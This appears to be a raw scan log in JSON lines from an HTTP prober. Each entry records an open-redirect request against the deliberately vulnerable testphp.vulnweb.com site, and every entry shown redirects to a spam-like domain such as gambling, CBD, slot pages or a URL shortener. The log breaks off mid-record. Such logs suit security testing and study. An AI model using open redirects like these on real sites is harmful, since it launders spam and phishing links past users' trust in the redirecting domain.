\n{\"timestamp\":\"2024-11-13T02:27:59.845998219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://buypsychedelicwateronline.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://buypsychedelicwateronline.com/\",\"location\":\"http://buypsychedelicwateronline.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://buypsychedelicwateronline.com/\",\"time\":\"348.049976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:59.869490197Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://candujudi.online/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://candujudi.online/\",\"location\":\"http://candujudi.online/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://candujudi.online/\",\"time\":\"347.958766ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.160716031Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cantandonanas.com/foro/profile/moisesmcwilliam/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cantandonanas.com/foro/profile/moisesmcwilliam/\",\"location\":\"http://cantandonanas.com/foro/profile/moisesmcwilliam/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cantandonanas.com/foro/profile/moisesmcwilliam/\",\"time\":\"343.000116ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.210114263Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://casinozp2.apeaceweb.net/soccer-online-for-tips-2021/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://casinozp2.apeaceweb.net/soccer-online-for-tips-2021/\",\"location\":\"http://casinozp2.apeaceweb.net/soccer-online-for-tips-2021/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://casinozp2.apeaceweb.net/soccer-online-for-tips-2021/\",\"time\":\"338.303243ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.218244569Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://casinobingopnd.natallco.com/betting-for-lastupdate-1969/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://casinobingopnd.natallco.com/betting-for-lastupdate-1969/\",\"location\":\"http://casinobingopnd.natallco.com/betting-for-lastupdate-1969/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://casinobingopnd.natallco.com/betting-for-lastupdate-1969/\",\"time\":\"356.133229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.296845544Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com\",\"location\":\"http://caverta.madpath.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://caverta.madpath.com\",\"time\":\"352.875999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.343601568Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/\",\"location\":\"http://caverta.madpath.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://caverta.madpath.com/\",\"time\":\"356.565033ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.439220342Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/%20%20%20%20/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/%20%20%20%20/\",\"location\":\"http://caverta.madpath.com/ /\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://caverta.madpath.com/%20%20%20%20/\",\"time\":\"352.479518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.504486897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://caverta.madpath.com/management.html\",\"location\":\"http://caverta.madpath.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://caverta.madpath.com/management.html\",\"time\":\"352.345326ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.534830062Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cbdoilrich.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cbdoilrich.com\",\"location\":\"http://cbdoilrich.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cbdoilrich.com\",\"time\":\"344.523064ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.592983636Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cbs79.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cbs79.com/\",\"location\":\"http://cbs79.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cbs79.com/\",\"time\":\"348.997967ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.673174162Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cbtresultaatuitopleiden.nl\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cbtresultaatuitopleiden.nl\",\"location\":\"http://cbtresultaatuitopleiden.nl\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cbtresultaatuitopleiden.nl\",\"time\":\"347.898772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.744222543Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cdsassad67as.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cdsassad67as.blogspot.com/\",\"location\":\"http://cdsassad67as.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cdsassad67as.blogspot.com/\",\"time\":\"340.551961ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:00.845045232Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ciekawowo.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ciekawowo.blogspot.com\",\"location\":\"http://ciekawowo.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ciekawowo.blogspot.com\",\"time\":\"361.480998ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:04.057476132Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://clovisautocare.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://clovisautocare.com/\",\"location\":\"http://clovisautocare.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://clovisautocare.com/\",\"time\":\"352.680202ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:04.212264418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://concreteadmixture1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://concreteadmixture1.blogspot.com/\",\"location\":\"http://concreteadmixture1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://concreteadmixture1.blogspot.com/\",\"time\":\"361.99073ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:04.293987873Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://concreteadmixture1.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://concreteadmixture1.blogspot.com/management.html\",\"location\":\"http://concreteadmixture1.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://concreteadmixture1.blogspot.com/management.html\",\"time\":\"347.343051ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:04.336204973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://constructionroofingsheets.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://constructionroofingsheets.blogspot.com/management.html\",\"location\":\"http://constructionroofingsheets.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://constructionroofingsheets.blogspot.com/management.html\",\"time\":\"340.529716ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:04.70054356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cookfavor.com/crab-claws-recipe//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cookfavor.com/crab-claws-recipe//\",\"location\":\"http://cookfavor.com/crab-claws-recipe//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cookfavor.com/crab-claws-recipe//\",\"time\":\"348.788498ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:05.103461109Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cse.google.com.sg/url?q=https://summertrims360keto.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cse.google.com.sg/url?q=https://summertrims360keto.com\",\"location\":\"http://cse.google.com.sg/url?q=https://summertrims360keto.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cse.google.com.sg/url?q=https://summertrims360keto.com\",\"time\":\"347.628108ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:05.135986856Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://csinogamblingstoriesxyp7.blogspot.com%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://csinogamblingstoriesxyp7.blogspot.com%2F\",\"location\":\"http://csinogamblingstoriesxyp7.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://csinogamblingstoriesxyp7.blogspot.com%2F\",\"time\":\"352.860337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:05.341242089Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/11841/my_files/situs-slot-online-gacor-seven4d/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/11841/my_files/situs-slot-online-gacor-seven4d/\",\"location\":\"http://cunori.edu.gt/campus/app/upload/users/1/11841/my_files/situs-slot-online-gacor-seven4d/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/11841/my_files/situs-slot-online-gacor-seven4d/\",\"time\":\"348.295941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:05.873967939Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/Sv388.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/Sv388.html\",\"location\":\"http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/Sv388.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/Sv388.html\",\"time\":\"348.719089ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:05.925134199Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/idnplay.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/idnplay.html\",\"location\":\"http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/idnplay.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/1/12734/my_files/idnplay.html\",\"time\":\"344.556401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:07.602034444Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/8/8967/my_files/sv8.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/8/8967/my_files/sv8.html\",\"location\":\"http://cunori.edu.gt/campus/app/upload/users/8/8967/my_files/sv8.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cunori.edu.gt/campus/app/upload/users/8/8967/my_files/sv8.html\",\"time\":\"351.501338ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:08.897081391Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://customfurniturewoodensole.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://customfurniturewoodensole.blogspot.com/\",\"location\":\"http://customfurniturewoodensole.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://customfurniturewoodensole.blogspot.com/\",\"time\":\"342.929299ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:08.945249492Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://customfurniturewoodensole.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://customfurniturewoodensole.blogspot.com/management.html\",\"location\":\"http://customfurniturewoodensole.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://customfurniturewoodensole.blogspot.com/management.html\",\"time\":\"350.563772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:09.258199362Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/\",\"location\":\"http://customisedfurniturewoodensole.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/\",\"time\":\"350.559838ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.131826402Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/management.html\",\"location\":\"http://customisedfurniturewoodensole.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://customisedfurniturewoodensole.blogspot.com/management.html\",\"time\":\"349.223729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.150906761Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://cutt.ly/8m2Kkfk\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://cutt.ly/8m2Kkfk\",\"location\":\"http://cutt.ly/8m2Kkfk\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://cutt.ly/8m2Kkfk\",\"time\":\"339.247194ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.199705594Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dailymagazinenews.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dailymagazinenews.com/\",\"location\":\"http://dailymagazinenews.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dailymagazinenews.com/\",\"time\":\"351.947097ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.219608665Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dbgskjbgkb.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dbgskjbgkb.blogspot.com/\",\"location\":\"http://dbgskjbgkb.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dbgskjbgkb.blogspot.com/\",\"time\":\"348.678455ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.506032658Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dbgskjbgkb.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dbgskjbgkb.blogspot.com/management.html\",\"location\":\"http://dbgskjbgkb.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dbgskjbgkb.blogspot.com/management.html\",\"time\":\"342.963122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.563125245Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://df.misis.ru/user/twine6chick/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://df.misis.ru/user/twine6chick/\",\"location\":\"http://df.misis.ru/user/twine6chick/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://df.misis.ru/user/twine6chick/\",\"time\":\"351.493639ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.572565515Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://diablo4mobile-android.xyz\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://diablo4mobile-android.xyz\",\"location\":\"http://diablo4mobile-android.xyz\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://diablo4mobile-android.xyz\",\"time\":\"352.140459ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{